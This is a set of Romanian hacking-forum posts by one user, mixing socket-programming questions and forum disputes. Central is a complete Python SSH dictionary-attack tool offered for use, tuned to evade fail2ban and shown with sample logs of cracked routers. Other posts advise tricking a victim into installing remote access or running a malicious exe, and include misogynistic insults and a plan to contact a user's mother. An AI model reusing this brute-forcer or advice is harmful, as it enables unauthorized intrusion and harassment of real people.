Elohim

Instalati-va Python 2.7, nu alte versiuni .

Ca script language, Python si Ruby, iar ca limbaj de programare abia abia la inceput cu C. *Nota personala: Fiind obisnuit cu scripting, cand am trecut la C, m-am simtit un pic inapoiat din pacate, datorita usurintei de a lucra cu partea de networking in Python/Ruby.

Teoretic, da, practic, NU. Posibile metode: - Il convingi cumva sa instaleze FileZilla ftp server, si sa dea access la tot C: , si apoi sa ii ceri si ip-ul - vreun 0-day , 1-2-day exploit pentru vreun cmd shell, si apoi sa iti urci datele prin ftp ( solutie de dragul de a o scrie ) - il convingi sa activeze RDP / VNC / logmein / team viewer / join-me si sa plece din camera - ... Nu prea merge ca la telefonia fixa de pe vreama romtelecom, cand legai 3 fire in 2 miscari prin scara blocului, si vorbeai de pe abonamentul vecinei. Prostia e mare, gandeste-te la o solutie stupida si simpla incat sa nu para suspicios, si trimite-i vreun exe nasol sa iti faci de cap.

RAM garantat: 5GB / burst: 6GB CPU 4 core (2Ghz) Spa?iu pe disk 250GB 20 EURO WTF?!?!?! Pretul pentru un vps de genul acela nu ti-a inspirat din prima teapa ? ma refer la @sleed, esti "neresponsive" pentru ca ADD ?

@compile, da, intr-adevar doar de un recv() cu timeout aveam nevoie, exemplul tau ar parea ca se potriveste perfect. O sa ii fac o proba acum. Multumesc celor care au postat. Daca nu trec prea multe zile, o sa postez solutia scrisa de mine, pentru future refferences.

@aelius, fix acel articol l-am recitit de peste 30 de ori pana sa postez acest thread. Motivul era ca preferam sa nu folosesc select() . Cred ca inca un lucru care l-am omis sa specific, este ca ma intereseaza acest lucru dpdv al client-ului, nu al server-ului. Exemplu foarte scurt: In cazul in care Server refuza sa imi mai dea vreun mesaj inapoi, dar nici nu imi inchide sesiunea, risc sa stau cu socket-ul pornit pana inchid programul, lucru care incerc sa il evit. Multe exemple implica select(), nu am nici cel mai mic motiv sa evit aceasta functie, dar abia am inceput cu C, si select mi se pare un pic peste mine. Se pare ca trebuie sa mai citesc. Multumesc pentru ajutor. Daca mai doreste cineva sa isi exprime parerea cu un exemplu, nu neaparat de pe Google, este binevenit.

Am si eu nevoie de un exemplu de o initializare a unui socket non-blocking ( pentru recv() sau global ) impreuna cu un timeout. Nu am incercat nimic inca, sunt ceva exemple pe stackoverflow, unul mai in ceata decat celalalt. De preferat C, daca nu, C++ Multumesc in avans.

Nu va mai ajung site-uri gen scriptmafia si alte warez-related, faceti tutoriale acum. Gata, ai invatat cum "sa faci sniffing pe whatsapp" ? Te-ai mutat la furat teme ?

@NOVATu , scoate Python 3.3, si instaleaza 2.7 Cred ca trebuia sa specific asta in OP, my bad. **mi-a, sa-l, imi

Cred ca s-a mai intrebat, dar a gasit cineva un sample pana acum ?

Sunteti drogati frate? Tu intelegi ceva din ce ai scris?Cum vrei sa te bage cineva in seama cu post-ul asta, si sa primesti si raspunsurile care le cauti ?

@aelius

Reparati-va indent-urile baieti. Scrie alb pe negru " Inconsistent use of tabs and spaces ". Sau cautati un indent fixer pt python. @poppers13 , este ori v ori no, nu v/no lol.

Asta nu prea tine de ei. Gigel poate sa isi procure un domeniu de la X, care ofera DNS impreuna cu domeniu, sa isi faca "self-registered" name servers si sa le trimita cate ip-ul lor. Daca contul de cPanel este facut corect, hostingul va stii de unde sa ia datele cand se acceseaza domeniul catre ei. Da, mai sunt si nazisti ca namecheap care te obliga sa ai niste ns-uri cand adaugi un domeniu, dar desi nu am folosit niciodata hosting din Romania, ma indoesc ca sunt firme atat de retardate incat sa faca asa ceva. P.S. De cele mai multe ori, cam orice domain seller o sa va ceara 2 ip-uri, cate unu pentru fiecare name server. Daca va apucati sa le cereti pe support / chat, o sa o dea in prosteala ( bani, nu e voie, cacat ). Asa ca nu le cereti. Cam orice server are cel putin 2-3 ip-uri. Umblati la range-uri, adaugati / scadeti din ip +/- 1.

dafuq ? Si eroarea aia nu inseamna ca site-ul e picat, inseamna ca sunt prea multe request-uri si serverul nu face fata. Nu ne intereseaza ca si comunitate de acel baietel, s-a precizat clar, chiar si de Administratori. Give it a rest.

@spide112 , multumesc. In legatura cu detectia la brute force, este facut in asa fel incat, ia o singura parola, un singur user, si trece prin toate ip-urile, apoi revine, ia a doua parola ( daca exista ) , acelasi user, si trece iar prin ip-uri. Niciodata nu o sa existe 2 login attempts consecutive intr-un interval scurt (Daca este folosit un ip list considerabil, ex: 40 000 or so ). Bine inteles, nu este fail-proof, dar in 80% din cazuri cel putin ar trebui sa treaca de fail2ban and alike systems.

Urmatorul script este un dictionary attack tool pentru SSH scris in Python. import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() Am dat un mic exemplu despre usage daca il porniti fara argumente. Va sfatuiesc sa trecei odata prin ip-uri cu un singur user si o parola, si argumentul bad, pentru a ramane doar cu ip-urile care accepta logarea prin SSH. Apoi va luati ip-urile din bad.txt si le folositi doar pe ele. Face 3 fisiere: raw.txt nologin.txt si valid.txt In raw.txt o sa fie puse toate, si cele care au *sh disabled, si cele care se logheaza normal. In nologin.txt o sa fie puse doar cele care suporta un ssh transport,sau nu au niciun fel de shell activ, iar in valid.txt cele care au shell activ, si li se va adauga si banner-ul ( uname -a ) exemplu de valid.txt: 68.170.**.24 ubnt ubnt|Linux Ubiquiti 2.6.32.54 #1 Thu Aug 16 13:41:25 EEST 2012 mips unknown 68.117.**.194 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.13.**.45 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown 68.170.**.64 ubnt ubnt|Linux AirRouter 2.6.32.54 #1 Fri Mar 8 10:15:49 EET 2013 mips unknown Daca vreti sa fie verbose, si sa vedeti ce se intampla, scoate comment-urile de la print . Va trebuie paramiko, dar cine chiar vrea sa il foloseasca o sa se descurce si singur. Acesta e unu din motivele pentru care nu l-am compilat nici pt win nici pt linux. Astept pareri si posibile imbunatatiri. Nu mai dati bani pe asa zisele "scannere" sau "arhive" private.

Frumoasa dezbatere, sau cel putin initiativa in sine. Din pacate in realitate lucrurile nu stau chiar asa. Nu o zic ca un fan al Windows, pentru ca nu sunt. Si eu, printre multe alte persoane, astept cu nerabdare ziua cand Windows o sa reprezinte o minoritate. INSA, punctele dezbatute mai sus sunt foarte putine. Vorbim dpdv al unei firme, care pana acum, a rulat XP in toata retea, are angajati care nu sunt asa de priceputi, ei stiind doar sa porneasca, sa ruleze programul X, sa isi faca un tabel in excel si sa dea log off. Un prim punct forte unde linux, respectiv Ubuntu pierde, este facilitatea de Remote Desktop. Da sunt o gramada de alternative o sa ziceti, precum VNC, join.me, logmein, Team Viewer, unele gratuite, altele nu. Dar nu exista o varianta built-in in OS, precum Remote Desktop Protocol la Windows. Aici deja se pierd 70% din firme care depind de asta iar majoritatea nu vor sa auda de alternative third party. Pe langa asta, trecea la Linux, pentru multe firme, ar insemna bani cheltuiti pentru training pentru staff-ul lor, lucru care multi dintre ei ar prefera sa evite, din motive evidente. Dar sa zicem ca asta nu ar fi o problema asa mare. Apoi vine problema de Microsoft Office , Microsoft Exchange si altele. Da, exista wine, dar aici revenim iar la problema de training, si implicit de bani cheltuiti. Ar mai fi cateva lucruri de punctat, nu imi vin acum in minte. Nu sunt pro windows, dar o sa mai dureze ceva ani pana cand adevaratii consumatori ( firmele ) isi vor indrepta privirea catre Linux / ubuntu.

Futu-i scoala masii, cu untura nu mai merge unsa. Acum ii dati DDOS

Too late, I'm calling his mum.

Mamica ta stie ce faci ? Vrei sa afle ?

Democratia e democratie, votul e vot. Comunitatea decide. Parere proprie: Daca baietelul nu se comporta ca un copil retardat plin de "legale" si comportandu-se arogant pe aici, afisandu-se intr-un mod de cacat, penibil cu acest "hack" al lui , nu avea Nem nimic cu el. Dar considerand comportamentul lui pe aici, pai normal ca iti vine sa ii penetrezi mamica. Asa are si RST un exemplu pentru "ASA NU"

De acord cu @DarkPanda si mai erau cativa care nu imi aduc aminte userul lor. Inca nu au invatat ca, precum femeile, firmele te vad mai bine daca taci ) Off with his head.

Facea / face brute force pe FTP, iar daca "prinde" ceva, verifica daca portul 3389 este deschis, cu gandul ca login-ul se nimereste. In 40-50% din cazuri chiar asta este. Cred ca este eficient si azi intr-o oarecare masura.

Poate ni se da mail-ul baietelului, si dam de a lui mama draga. Sa o sunam sa ii spunem ce face baietelul